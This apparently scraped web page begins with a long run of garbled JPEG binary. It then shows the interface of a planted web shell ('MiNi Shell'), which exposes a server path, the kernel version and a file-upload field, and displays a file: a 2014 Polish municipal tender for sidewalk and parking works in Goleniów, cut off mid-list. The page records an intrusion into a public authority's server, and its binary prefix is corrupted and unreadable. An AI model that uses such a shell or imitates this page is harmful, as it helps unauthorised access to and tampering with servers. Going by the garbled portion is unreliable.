JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140918/198745-N-2014.html

<p class="kh_header"><b>Goleniów: Remont chodników i utwardzenie terenu w  Goleniowie</b><br>
<b>Numer ogłoszenia: 198745 - 2014; data zamieszczenia: 18.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Goleniów , Plac Lotników 1, 72-100 Goleniów, woj. zachodniopomorskie, tel. 091 4698200, faks 091 4698298.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.goleniow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont chodników i utwardzenie terenu w  Goleniowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony  trzy części tj.:
a) Część I - Budowa przejścia dla pieszych przy ul. Barnima w Goleniowie
b) Część II - Budowa parkingu przy ul. Kilińskiego w Goleniowie
c) Część III- Remont chodnika ul. Zielona Droga w Goleniowie
1 W ramach części I zamówienia zakres dotyczy budowy przejścia dla pieszych przy ul. Barnima w Goleniowie i obejmuje:
1)	Roboty pomiarowe 0,04 km,
2)	Rozebranie ręczne podbudowy z gruntu stabilizowanego o grubości 10cm -30,50 m2,
3)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego 3,00 m3,
4)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1km odległości - dodatkowe 4km  3,00 m3,
5)	Rozbiórka podbudowy z brukowca gr. 15cm z wywozem i utylizacją 92,00 m2,
6)	Rozebranie mechaniczne nawierzchni z tłucznia kamiennego na podbudowie o grubości 15cm 92,00 m2,
7)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego 14,00 m3,
8)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1km odległości - dodatkowe 4km  14,00 m3, 
9)	Rozbiórka nawierzchni bitumicznej z wywozem i utylizacją 92  m2,
10)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego 14 m3,
11)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1km odległości - dodatkowe 4km  14,00 m3
12)	Rozebranie krawężników betonowych o wymiarach 20x30cm, na podsypce cementowo-piaskowej  41,00 m,
13)	Rozebranie ław z betonu pod krawężniki 3,4 m3,
14)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego 5,68 m3,
15)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1 km - dodatkowe 4 km  5,68 m3,
16)	 Rozebranie chodników, wysepek przystankowych i przejść dla pieszych z płyt betonowych o wymiarach 50x50x7cm na podsypce cementowo-piaskowej 30,5 m2,
17)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego  2,14 m3,
18)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1km odległości - dodatkowe 4km 2,14 m3,
19)	Zdjęcie tarcz (tablic) znaków drogowych z wywozem 5 szt.,
20)	Rozebranie słupków do znaków 3 szt.,
21)	 Wywóz złomu z terenu rozbiórki samochodem skrzyniowym na odległość do 1km z załadunkiem i wyładunkiem ręcznym - ujęto wywóz słupków i tarcz 0,09 t
22)	Roboty ziemne w gruncie kategorii I-II wykonywane ładowarkami gąsienicowymi o pojemności łyżki 1,00m3 z transportem urobku samochodami samowyładowczymi 5-10t na odległość do 1km 10 m3,
23)	Formowanie i zagęszczanie spycharkami nasypów z gruntu kategorii III-IV o wysokości do 3 m. (Spycharka gąsienicowa 74kW (100KM) 10 m3
24)	Regulacja pionowa włazów kanałowych 2 szt.,
25)	Wykonanie platformy roboczej grubości 15cm ze stabilizacji gruntu cementem Rm=2,5Mpa -109 m2,
26)	Podbudowy z gruntu stabilizowanego cementem o grubości po zagęszczeniu 12cm
wykonywane sprzętem mechanicznym rolniczym 109,00 m2,
27)	Podbudowy z gruntu stabilizowanego cementem wykonywane sprzętem mechanicznym rolniczym - za każdy dalszy 1cm - dodatkowe 3 cm- 109 m2,
28)	Humusowanie skarp warstwą humusu grubości 5cm z obsianiem 15,50 m2,
29)	Materiałami cienkowarstwowymi - linie ciągłe 4,30 m2,  
30)	Oznakowanie poziome jezdni farbą: linie segregacyjne i krawędziowe przerywane malowane mechanicznie  2,3 m2,
31)	Oznakowanie poziome jezdni farbą: linie na skrzyżowaniach i przejściach dla pieszych malowane mechanicznie 28,2 m2,
32)	 Słupki do znaków drogowych z rur stalowych 7,00 szt.,
33)	Przymocowanie znaków zakazu, nakazu, ostrzegawczych i informacyjnych o powierzchni do 0,3m2  9,0 szt.,
34)	Ustawienie krawężników betonowych 15x30 na podsypce cementowo piaskowej 47,00 m,
35)	Chodniki z kostki brukowej betonowej prostokątnej 20x10cm o grubości 8 cm na podsypce cementowo-piaskowej  100,00 m2,
36)	Chodniki z kostki brukowej betonowej prostokątnej 20x10cm o grubości 8 cm na podsypce cementowo-piaskowej 7,00 m2,
37)	Obrzeża betonowe o wymiarach 30x8cm na ławie betonowej C12/15, z wypełnieniem spoin zaprawą cementową  9,50 m.



2. W ramach części II zamówienia zakres dotyczy budowy parkingu przy ul. Kilińskiego w Goleniowie obejmuje:

1)	Wykonanie koryta gł. 30 cm - 100 m2,
2)	Wywóz ziemi z budowy 30 m3, 
3)	Profilowanie i zagęszczanie podłoża  100 m2,
4)	Ustawienie krawężnika betonowego  o wym. 15x30 30m,
5)	Wykonanie podbudowy  z kruszywa łamanego  gr 20 cm -100 m2,
6)	Nawierzchnia z kostki betonowej gr 8 cm na podsypce cem.-piaskowej 100m2. 


3. W ramach części III zamówienia zakres remontu chodnika ul. Zielona Droga w Goleniowie

1)	Rozebranie chodników  z płytek 35x35 i 50x50 - 360 m2,
2)	Rozebranie trylinki -25 m2,
3)	Rozebranie krawężników betonowych -125 m,
4)	Ręczne rozebranie nawierzchni z kostki z kostki bet. - 50 m2,
5)	Wykonanie koryta  gł. 20 cm - 100 m2,
6)	Wywiezienie gruzu -94,58 m3,
7)	Wykonanie nawierzchni z kostki betonowej gr 8 cm na podsypce cem-piaskowej - 440 m2,
8)	Regulacja pionowa studni - 3 szt.,
9)	Regulacja pionowa studzienek dla zaworów - 2 szt., 
10)	Podbudowa z kruszywa łamanego gr. 20 cm  - 25 m2,
11)	Ustawienie krawężników betonowych  -120 m,
12)	Ustawienie obrzeży betonowych -28 m,
13)	Ręczne planowanie gruntu - 70 m2,
14)	Wykonanie trawników - 70 m2..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, w przypadku udzielenia,              w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy robót, stanowiących:
a) na część I: nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia zgodnych z przedmiotem zamówienia podstawowego. Poszczególne pozycje z przedmiaru robót opisują rodzaj robót jakie Zamawiający przewiduje do realizacji w ramach zamówień uzupełniających. Podstawą do negocjacji ceny za zamówienie uzupełniające będzie złożony kosztorys ofertowy Wykonawcy w tym postępowaniu.
b) na część II:  nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia zgodnych z przedmiotem zamówienia podstawowego. Poszczególne pozycje z przedmiaru robót opisują rodzaj robót jakie Zamawiający przewiduje do realizacji w ramach zamówień uzupełniających. Podstawą do negocjacji ceny za zamówienie uzupełniające będzie złożony kosztorys ofertowy Wykonawcy w tym postępowaniu,
b) na część III:  nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia zgodnych z przedmiotem zamówienia podstawowego. Poszczególne pozycje z przedmiaru robót opisują rodzaj robót jakie Zamawiający przewiduje do realizacji w ramach zamówień uzupełniających. Podstawą do negocjacji ceny za zamówienie uzupełniające będzie złożony kosztorys ofertowy Wykonawcy w tym postępowaniu</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.53-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunku zawartego w art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi wykazać, iż dysponuje w zakresie wiedzy i doświadczenia w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
1) w ramach części I- co najmniej dwoma robotami budowlanymi, o charakterze odpowiadającym przedmiotowi zamówienia, tzn. obejmującymi swoim zakresem budowę lub remont chodników lub dróg o nawierzchni z kostki betonowej o wartości nie mniejszej niż 20.000,00 złotych za każdą robotę.
Wykonawca nie może sumować wartości kilku robót wymienionych powyżej o mniejszym zakresie dla uzyskania wymaganej wartości porównywalnej. 
W przypadku  składania ofert na trzy części zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same roboty budowlane.

2) w ramach części II - co najmniej dwoma robotami budowlanymi, o charakterze odpowiadającym przedmiotowi zamówienia, tzn. obejmującymi swoim zakresem budowę lub remont chodników lub dróg o nawierzchni z kostki betonowej o wartości nie mniejszej niż 20.000,00 złotych za każdą robotę.

Wykonawca nie może sumować wartości kilku robót wymienionych powyżej o mniejszym zakresie dla uzyskania wymaganej wartości porównywalnej. 
W przypadku  składania ofert na trzy części zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same roboty budowlane,
3) w ramach części III - co najmniej dwoma robotami budowlanymi, o charakterze odpowiadającym przedmiotowi zamówienia, tzn. obejmującymi swoim zakresem budowę lub remont chodników lub dróg o nawierzchni z kostki betonowej o wartości nie mniejszej niż 20.000,00 złotych za każdą robotę.
Wykonawca nie może sumować wartości kilku robót wymienionych powyżej o mniejszym zakresie dla uzyskania wymaganej wartości porównywalnej. 
W przypadku  składania ofert na trzy części zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same roboty budowlane
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunku zawartego w art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi wykazać w zakresie dysponowania odpowiednim potencjałem technicznym dysponuje: 

1) w ramach części I:
a)	co najmniej jedną spycharką lub ładowarką,
b)	co najmniej dwoma samochodami samowyładowczymi o ładowności min. 10 ton. 

W przypadku  składania ofert na trzy części zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać ten sam sprzęt.
2) w ramach części II:
a)  co najmniej jedną spycharką lub ładowarką,
b)  co najmniej dwoma samochodami samowyładowczymi o ładowności min. 10 ton.

W przypadku  składania ofert na trzy części zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać ten sam sprzęt.

3) w ramach części III:
a)	co najmniej jedną spycharką lub ładowarką,
b)	co najmniej dwoma samochodami samowyładowczymi o ładowności min. 10 ton. 

W przypadku  składania ofert na trzy części zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać ten sam sprzęt.

Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunku zawartego w art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi wykazać, w zakresie dysponowania osobami niezbędnymi do realizacji przedmiotu zamówienia dysponuje:
1) w ramach części I- co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności, które uprawniają do pełnienia funkcji kierownika robót drogowych w zakresie odpowiadającym przedmiotowi zamówienia lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia funkcji kierownika robót budowlanych w specjalności drogowej,

W przypadku  składania ofert na trzy części zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same osoby.

2) w ramach części II- co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności, które uprawniają do pełnienia funkcji kierownika robót drogowych w zakresie odpowiadającym przedmiotowi zamówienia lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia funkcji kierownika robót budowlanych w specjalności drogowej. 

W przypadku  składania ofert na trzy części zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same osoby,

3) w ramach części III- co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności, które uprawniają do pełnienia funkcji kierownika robót drogowych w zakresie odpowiadającym przedmiotowi zamówienia lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia funkcji kierownika robót budowlanych w specjalności drogowej. 

W przypadku  składania ofert na trzy części zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same osoby.

Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą  spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający określa roboty budowlane, których dotyczy obowiązek wskazania przez Wykonawcę w wykazie oraz załączenia do nich poświadczeń, zawierających informację o robotach budowlanych wykonanych należycie oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych. Wykonawca ma się wykazać wykonaniem  w okresie ostatnich 5 - ciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie:

1) w ramach części I - co najmniej dwoma robotami budowlanymi, o charakterze odpowiadającym przedmiotowi zamówienia, tzn. obejmującymi swoim zakresem budowę lub remont chodników lub dróg o nawierzchni z kostki betonowej o wartości nie mniejszej niż 20.000,00 złotych za każdą robotę.

2) w ramach części II - co najmniej dwoma robotami budowlanymi, o charakterze odpowiadającym przedmiotowi zamówienia, tzn. obejmującymi swoim zakresem budowę lub remont chodników lub dróg o nawierzchni z kostki betonowej o wartości nie mniejszej niż 20.000,00 złotych za każdą robotę.

3) w ramach części III - co najmniej dwoma robotami budowlanymi, o charakterze odpowiadającym przedmiotowi zamówienia, tzn. obejmującymi swoim zakresem budowę lub remont chodników lub dróg o nawierzchni z kostki betonowej o wartości nie mniejszej niż 20.000,00 złotych za każdą robotę.

Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganej wartość porównywalnej.
(W przypadku składania oferty wspólnej, Wykonawcy składają jeden ww. wykaz).
 
W przypadku  składania ofert na trzy  części zamówienia, Wykonawca wykazując   spełnienie warunków udziału w postępowaniu może wykazać te same roboty budowlane.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W ramach części I:
a)	formularz ofertowy przygotowany dla zamówienia - przygotowany zgodnie                                 z załącznikiem nr 1.1.  do SIWZ, 
b)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - przygotowane zgodnie z załącznikiem nr 2.1. do SIWZ,
c)	jeżeli Wykonawca ma zamiar zlecić wykonanie części robót podwykonawcy to musi wypełnić          i załączyć do oferty załącznik nr 9 do SIWZ (jeżeli dotyczy),
d)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;                   (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego             z nich),
e)	pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik,
f)	kosztorys ofertowy (brak kosztorysu ofertowego złożonego zgodnie z zapisami SIWZ spowoduje odrzucenie oferty). 
W ramach części II:
a)	formularz ofertowy przygotowany dla zamówienia - przygotowany zgodnie                                 z załącznikiem nr 1.2.  do SIWZ, 
b)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - przygotowane zgodnie z załącznikiem nr 2.2. do SIWZ,
c)	jeżeli Wykonawca ma zamiar zlecić wykonanie części robót podwykonawcy to musi wypełnić          i załączyć do oferty załącznik nr 9 do SIWZ (jeżeli dotyczy),
d)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;                   (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego             z nich),
e)	pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik,
f)	kosztorys ofertowy (brak kosztorysu ofertowego złożonego zgodnie z zapisami SIWZ spowoduje odrzucenie oferty). 




W ramach części III:
a)	formularz ofertowy przygotowany dla zamówienia - przygotowany zgodnie                                 z załącznikiem nr 1.3.  do SIWZ, 
b)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - przygotowane zgodnie z załącznikiem nr 2.3. do SIWZ,
